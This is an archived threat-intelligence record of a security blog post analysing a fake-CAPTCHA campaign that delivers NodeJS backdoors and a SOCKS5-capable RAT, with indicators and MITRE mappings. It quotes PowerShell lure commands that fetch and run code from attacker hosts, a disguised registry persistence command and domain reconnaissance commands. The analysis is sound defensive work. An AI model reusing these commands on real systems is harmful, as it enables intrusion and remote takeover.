{
	"id": "89be5e99-f54c-42d4-8076-c5df3aad1040",
	"created_at": "2026-04-06T00:19:06.480589Z",
	"updated_at": "2026-04-12T02:21:10.211543Z",
	"deleted_at": null,
	"sha1_hash": "787bb40322af47f6d9997b0154c131f97aef118c",
	"title": "Yet Another NodeJS Backdoor (YaNB): A Modern Challenge",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3891353,
	"plain_text": "Yet Another NodeJS Backdoor (YaNB): A Modern Challenge\r\nBy Reegun Jayapaul\r\nPublished: 2025-04-29 · Archived: 2026-04-05 17:50:40 UTC\r\nDuring an Advanced Continual Threat Hunt (ACTH) investigation conducted in early March 2025, Trustwave SpiderLabs identified a notable resurgence in malicious campaigns exploiting deceptive CAPTCHA verifications. These campaigns trick users into executing NodeJS-based backdoors, subsequently deploying sophisticated NodeJS Remote Access Trojans (RATs) similar to traditional PE-structured legacy RATs.\r\nInitial analysis reveals that the attack begins with executing a malicious NodeJS script, establishing a connection to the attacker-controlled infrastructure. The malware remains in a passive state awaiting further commands, which facilitates the deployment of additional malicious components. Significantly, our research uncovered the deployment of a more advanced NodeJS RAT variant capable of tunneling malicious traffic through SOCKS5 proxies, with communications further secured using XOR-based encryption methods.\r\nMoreover, SpiderLabs has observed a notable increase in similar NodeJS-based backdoor deployments across multiple malware campaigns, including KongTuke, Fake CAPTCHA schemes, Mispadu, and Lumma stealers. Given the effectiveness and high success rates of fake CAPTCHA techniques as an initial access vector compared to traditional methods, we anticipate continued growth and prevalence of these tactics.\r\nThese instances are also not the first time the team has investigated the malicious use of CAPTCHA. Earlier reports include Unveiling the CAPTCHA Escape: The Dance of CAPTCHA Evasion Using TOR, Dissecting a Phishing Campaign with a CAPTCHA-based URL, and the Resurgence of a Fake Captcha Malware Campaign.\r\nInitial Execution\r\nCompromised Website\r\nThe initial access that the team identified is coming from a compromised website. 
Victims can reach this site through various means, such as clicking on articles shared via social media posts. Inspecting the page source reveals injected malicious code that loads a JavaScript file.\r\nFigure 1. Malicious injected KongTuke script.\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/\r\nPage 1 of 22\n\nThis injected code belongs to KongTuke. KongTuke was first mentioned in May 2024. However, it was just one of the domains used for redirection from compromised websites to malicious websites for payload delivery. Eventually, the name KongTuke became associated with this set of activities. This cluster of activities was observed and monitored by various researchers and was given various names such as 404TDS, Chaya_002, LandUpdate808, and TAG-124. These are malicious activity clusters that share the same patterns in their attack chain.\r\nIn different scenarios, the script does not always load the fake CAPTCHA, as there is a check that monitors whether the user’s environment is compatible with it.\r\nFirst Stage JavaScript File: Injected Script\r\nThe KongTuke campaign has been active since at least September 2024. In earlier versions of the campaign, the injected script followed a naming convention that included hardcoded keywords such as “metrics”, “analyzer”, and “analytics.” However, in November 2024, the latest iteration of KongTuke introduced a new naming convention. This aligns with the injected URL and JavaScript naming seen in Figure 1.\r\nFigure 2. 
KongTuke activities from September 2024 to March 2025.\r\nThe name, which consists of 4 alternating alphabet and numeral characters, is the latest naming convention observed to be employed by KongTuke.\r\nRegular Expression for the Injected Script:\r\n\\d[a-z]\\d[a-z]\\.js\r\nRegarding the domains used in the injected scripts, most of the domains observed belong to AS 399629 (BLNWX) or BL Networks, US. Aside from BL Networks, other ASNs seen were Eonix Corporation and Cloudflare, albeit with only a few domains coming from them.\r\nTable 1. Observed injected domains.\r\nMoreover, when only the domain is accessed, it returns a unique hash resource and shows the words “It works.” Hence, the team was able to identify more domains using this pattern.\r\nThe response, once the injected URL is loaded, is an obfuscated JS file that contains numerous functions. The following are the highlights of the deobfuscated code:\r\n1. Cookie Checking\r\nThe script checks if the cookie “isCompleted” already exists. If not, it sets this cookie with a lifetime of 4 hours only.\r\nFigure 3. Code for cookie checking.\r\n2. Data Collection\r\nThe script gathers the following data in a Base64-encoded format and sends it to the C2:\r\nOperating System\r\nIP Address\r\nCurrent URL (referrer)\r\nBrowser Type\r\nUser-Agent String\r\nGeolocation based on the IP address\r\nFigure 4. Code that is part of the data collection routine.\r\nAs shown in Figure 4, part of the routine is getting the response from the URL hxxps://www.cloudflare[.]com/cdn-cgi/trace. 
Through this, the attacker can obtain network and system-related information such as IP addresses and geolocation data.\r\nThe collected data will be sent over to the js.php URL in the following format:\r\nFigure 5. Sending collected data.\r\n3. Loading of Next Stage\r\nIf the response from the C2 is smaller than 35 bytes, it reloads the page. Otherwise, it writes the response into the page. This leads to the fake CAPTCHA webpage.\r\nFigure 6. Preparing for the next stage.\r\nSecond Stage JavaScript File: Fake CAPTCHA\r\nThe succeeding stage leads to the fake CAPTCHA webpage. This social engineering technique, also generally known as ClickFix, is prevalent nowadays and has been proven to be effective in deploying malicious payloads into systems. The usual theme of the ClickFix lure is either a message prompting users to fix fake errors or to participate in a verification routine.\r\nFigure 7. 
Fake CAPTCHA emulation.\r\nAs observed in this incident, there are two versions of PowerShell scripts that are copied to the user’s clipboard during this routine.\r\nVersion 1 - Copied Command: cmd /C \"\"PowerShell.exe\" -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds) -band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u | iex\"\"\r\nVersion 1 - Network C2: hxxps://138.199.161[.]141:8080/1741976336\r\nVersion 2 - Copied Command: `cmd /c start /min powershell -noprofile -w H -c \"$r=iwr hxxps://compaq-hr-buyerswhere.trycloudflare[.]com/cloudfla -h @{ 'X-ComputerName'=$env:COMPUTERNAME };$s=[Text.Encoding]::Utf8.GetString( $r.Content);iex $s\"`;\r\nVersion 2 - Network C2: hxxps://compaq-hr-buyers-where.trycloudflare[.]com/cloudfla\r\nTable 2. Commands from the fake CAPTCHA.\r\nVersion 1\r\nThe script encodes a specific date (1970-1-1) in Base64 format and then decodes it. Using this parsed date, the script calculates the current UNIX timestamp (seconds since 1970-01-01) and applies a bitwise operation. A hardcoded IP address is combined with a predefined port to construct a URL path.\r\nFigure 8. Version 1 code snippet with a hardcoded IP address.\r\nVersion 2\r\nThe second version of the script is a malicious JavaScript designed to collect system information and execute remote PowerShell commands on a victim's machine.\r\nFigure 9. Version 2 code snippet using TryCloudflare URL.\r\nIt first stores the victim's IP address and specifies a remote URL (stat.php). The script then launches PowerShell in a hidden window and retrieves a payload from a TryCloudflare URL. TryCloudflare allows users to create temporary tunnels to local servers without requiring a Cloudflare account, making it an effective tool for attackers to host and deliver malicious content. 
The script sends the victim’s computer name to the attacker's server.\r\nRegardless of the script version, this results in the deployment of a payload which is a NodeJS RAT.\r\nInitial NodeJS Script\r\nThis NodeJS script contains a number of functionalities, and at the top are several anti-VM checks:\r\nIf the system manufacturer is QEMU, the process ends.\r\nIf the memory is less than 4GB or the used memory is less than 1.5GB, it exits.\r\nIf the computer name contains \"DESKTOP-\", it ends.\r\nOnce past these defense mechanisms, it downloads a Node.js Windows 64-bit package from this URL:\r\nhttps://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip\r\nThis downloaded package is saved in the %APPDATA% directory and its contents are extracted. This will be used in the execution of the payload, which is a Node.js-based backdoor.\r\nDissecting a Node.js-Based Backdoor\r\nDetach and Execute as Background: The script detaches itself and runs in the background so that termination of the parent process does not terminate the backdoor.\r\nFigure 10. Detach and execute.\r\nCollect System Information: The initial reconnaissance activity is to gather system information from a series of commands via powershell.exe or cmd.exe and obtain operating system (OS) details, running and installed services, mounted drives, and ARP cache.\r\nFigure 11. System information collection.\r\nData Transmission via XOR Encryption: The gathered data is transmitted by generating a random 4-byte byteKey, XORing the data with byteKey, concatenating the XOR’d data, byteKey, and encKey, compressing the result with gzip, and finally appending zlibKey at the end. 
The zlibKey is a checksum of the data sent.\r\nData Structure: [gzip (XOR_encrypted_data + random_byteKey + encKey)] + zlibKey\r\nPersistence Installation: Gathers the current process command line, which is node.exe. Extracts the NodeJS script from the command line node.exe -e “malicious script”, writes the script to disk as a .log file, and creates registry persistence with a fake browser updater string:\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"ChromeUpdater\" /t REG_SZ /d \"script_path\u003e\" /f\r\nFigure 12. Function atst, persistence installation.\r\nCommand and Control Listener: Prepares the host to connect to the C2 server and actively listens for instructions from the attacker. The data is transferred with the above custom encryption mechanism: [gzip (XOR_encrypted_data + random_byteKey + encKey)] + zlibKey\r\nFigure 13. C2 listener.\r\nC2 Actions: Once the C2 connection is initiated to the server, the host listens and waits for incoming commands from the attacker. The instruction set supports persistence registration, command execution, payload dropping, and the clearing of traces.\r\nTable 3. Command and actions.\r\nBackdoor Connection Logic: It sends an HTTP request, receives the response, and processes it. During our investigation, we found that the attacker dropped a NodeJS-based JS RAT and executed it via node.exe -e “dropped JS”.\r\nSend an HTTP request with certain options.\r\nCollect the response in chunks until it ends.\r\nFigure 14. 
Backdoor connection logic.\r\nCheck:\r\nIf statusCode is 502, reject (\"fail connect\").\r\nIf statusCode != 200, resolve without processing.\r\nIf the response is exactly 4 bytes and equals \"ooff\", terminate the process.\r\nIf the response is exactly 4 bytes and equals \"atst\", call atst(), then resolve.\r\nOtherwise, split off the last 4 bytes of the response as a key, then XOR-decrypt the main part (decBuf).\r\nThe final byte of decBuf indicates the file type (EXE, DLL, JS, CMD, or default), so the script knows how to handle it (e.g., write .exe to disk and execute).\r\n0 =\u003e EXE\r\n1 =\u003e DLL\r\n2 =\u003e JS\r\n3 =\u003e CMD\r\nFigure 15. Additional payload handler.\r\nPost-Infection\r\nDuring our investigation, we found that the above NodeJS backdoor listens for commands from C2 159[.]69[.]3[.]151, which the adversary uses to interact with the host. The adversary dropped another JS file and executed it via node.exe -e \"SCRIPT\". The JS script dropped post-infection is designed as a multi-functional backdoor capable of detailed system reconnaissance, executing remote commands, tunneling network traffic (Socks5 proxy), and maintaining covert, persistent access.\r\nDissecting a Node.js-Based RAT\r\nSystem Information Reconnaissance: The script starts by collecting system information, including the Windows OS version and the current user context, and sends it to the server in JSON format.\r\nFigure 16. Initial system reconnaissance – Client side.\r\nFigure 17. 
Initial system reconnaissance – Server side.\r\nRAT Commands: The TypeMsg commands defined in the script are essentially instruction types or command identifiers used by the malware to interpret and execute actions provided by the attacker. These commands are used for communication between the attacker (C2 server) and the compromised machine.\r\nTable 4. RAT commands and actions.\r\nSOCKS5 Proxy: The Socks5Thread class is used to establish a covert communication channel. The NodeJS RAT creates SOCKS5 proxy tunnels and allows attackers to proxy their traffic.\r\nMaintains Persistence: The CmdThread class maintains an interactive cmd.exe command shell to capture output and send it to the attacker. It also receives commands from the attacker for further exploitation.\r\nFigure 18. Maintains persistence.\r\nOne-Off Command Execution: The CmdOneLineThread class is used to execute one-off system commands received from the attacker and write the output to a randomly named log file. The shell reads the output file and sends the contents back to the attacker, then immediately deletes the log file.\r\nFigure 19. One-Off Command Execution.\r\nCommand and Control Servers: The NodeJS RAT script has embedded C2s, through which the data transmission and interaction by the attacker is carried out.\r\nFigure 20. Embedded RAT C2s.\r\nAdditional reconnaissance command: During the RAT session, the attacker also executed an additional reconnaissance command. The command serves as a reconnaissance tool designed to determine whether a Windows system is domain-joined. 
If the system is domain-joined, it collects detailed information about the Active Directory (AD) environment, including the number of computer objects, domain trusts, domain controllers, and Service Principal Names (SPNs). If the system is not part of a domain, it gathers local user group details, including memberships and privileges. This information can be used to identify potential targets, vulnerabilities, or paths for lateral movement within the network.\r\nFigure 21. Additional post-infection commands.\r\nBreakdown of Commands\r\nCheck Domain Membership\r\n$isDomainJoined = (Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain;\r\nEnumerate AD\r\n$domainInfo = 'AD: ' + (New-Object System.DirectoryServices.DirectorySearcher '(ObjectClass=computer)').FindAll().Count;\r\nEnumerate Domain Trust\r\nnltest /domain_trusts\r\nList Domain Controllers\r\nnltest /dclist:\r\nEnumerate Service Principal Names (SPNs)\r\nnltest /domain_trusts\r\nIf the host is not domain-joined\r\nLists local user groups and their members:\r\nGet-LocalGroup\r\nGet-LocalGroupMember\r\nRAT Simulation\r\nThe RAT polls the server every five minutes for incoming responses. As noted earlier, if the server sends the “ooff” command, the backdoor terminates immediately; if the “atst” command is received, the RAT executes the corresponding “atst” function and logs all activity to the path %APPDATA%[a-z0-9]{8}[a-z0-9]{8}.log.\r\nDuring our investigation, we discovered that the attacker deployed an additional Node.js-based JavaScript backdoor with RAT capabilities, though no PE files were dropped at that stage. At SpiderLabs, we replicated the RAT server to deliver a PE payload, allowing us to analyze its functionality and behavior. 
Once the backdoor establishes a connection to the server, any commands that the attacker issues are forwarded to the infected client. The client receives the response; if it is not “ooff” or “atst,” the RAT extracts the final four bytes as a key and applies an XOR decryption to the main data.\r\nIf the attacker transmits an EXE file, the response structure consists of encrypted data (decBuf) + 4-byte decKey; after XOR decryption with decKey, the data structure is file bytes + a 1-byte file type. If the last byte is 0, the file is written to disk as a .exe file and executed. The EXE is saved to and executed from %APPDATA%[a-z0-9]{8}[a-z0-9]{8}.exe, as implemented by the RAT client. We modified the RAT client to better understand its internal mechanisms and created a RAT server capable of sending and running PE files when a client connects. A detailed walkthrough of the RAT’s logic and behavior is included in the accompanying video.\r\nFigure 22. 
Connection termination when the ooff command is received.\r\nAppendix:\r\nMonitoring Opportunities:\r\nInjected JavaScript:\r\nREGEX:  hxxp:// //\\d[a-z]\\d[a-z]\\.js\r\nData Collection Stage\r\nhxxps:// /js.php?device= \u0026ip= \u0026refferer= \u0026browser= \u0026ua= \u0026domain= \u0026is_ajax=1\r\nIndicators of Compromise (IOCs)\r\nInjected JavaScript:\r\nVersion 1\r\nhxxp://138.199[.]161.141:8080\r\nhxxp://64.94.84[.]217:8080\r\nVersion 2\r\nhxxps://lack-behind-came-verification.trycloudflare[.]com/cloudfla\r\nhxxps://rwanda-ventures-soil-trains.trycloudflare[.]com/cloudfla\r\nhxxps://rebecca-nylon-invention-ii.trycloudflare[.]com/cloudfll\r\nMITRE Hunt Package\r\nTA0001 – Initial Access\r\nT1659 – Content Injection\r\nTA0002 - Execution\r\nT1059 - Command and Scripting Interpreter\r\nT1059.001 - PowerShell\r\nT1059.003 - Windows Command Shell\r\nT1059.007 - JavaScript\r\nTA0003 - Persistence\r\nT1543 - Create or Modify System Process\r\nT1543.003 - Windows Service\r\nT1053 - Scheduled Task/Job\r\nT1053.005 - Scheduled Task\r\nTA0004 - Privilege Escalation\r\nT1068 - Exploitation for Privilege Escalation\r\nTA0005 - 
Defense Evasion\r\nT1564 - Hide Artifacts\r\nT1564.003 - Hidden Window\r\nT1036 - Masquerading\r\nT1036.005 - Match Legitimate Name or Location\r\nT1070 - Indicator Removal on Host\r\nT1070.004 - File Deletion\r\nT1497 - Virtualization/Sandbox Evasion\r\nT1497.001 - System Checks\r\nTA0007 - Discovery\r\nT1082 - System Information Discovery\r\nT1057 - Process Discovery\r\nT1049 - System Network Connections Discovery\r\nT1083 - File and Directory Discovery\r\nT1518 - Software Discovery\r\nT1016 - System Network Configuration Discovery\r\nT1033 - System Owner/User Discovery\r\nT1069 - Permission Groups Discovery\r\nTA0011 - Command and Control\r\nT1071 - Application Layer Protocol\r\nT1071.001 - Web Protocols (HTTP/S)\r\nT1573 - Encrypted Channel\r\nT1095 - Non-Application Layer Protocol\r\nT1105 - Ingress Tool Transfer\r\nT1041 - Exfiltration Over C2 Channel\r\nTrustwave's recent revamp of its Advanced Continual Threat Hunt (ACTH) with a new patent-pending methodology enables Trustwave to conduct threat hunts and monitor our customers as this campaign continues.\r\nTrustwave offers ACTH as an option in Trustwave's Managed Detection and Response Services. For more information, please read Trustwave Revamps Continual Threat Hunting Enabling Significantly More Hunts and Unique Threat Findings.\r\nSource: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/"
	],
	"report_names": [
		"yet-another-nodejs-backdoor-yanb-a-modern-challenge"
	],
	"threat_actors": [
		{
			"id": "4390d8ec-605d-493a-81ee-d5ef80c07046",
			"created_at": "2025-05-29T02:00:03.223467Z",
			"updated_at": "2026-04-12T02:00:03.916957Z",
			"deleted_at": null,
			"main_name": "TAG-124",
			"aliases": [
				"LandUpdate808"
			],
			"source_name": "MISPGALAXY:TAG-124",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434746,
	"ts_updated_at": 1775960470,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/787bb40322af47f6d9997b0154c131f97aef118c.pdf",
		"text": "https://archive.orkl.eu/787bb40322af47f6d9997b0154c131f97aef118c.txt",
		"img": "https://archive.orkl.eu/787bb40322af47f6d9997b0154c131f97aef118c.jpg"
	}
}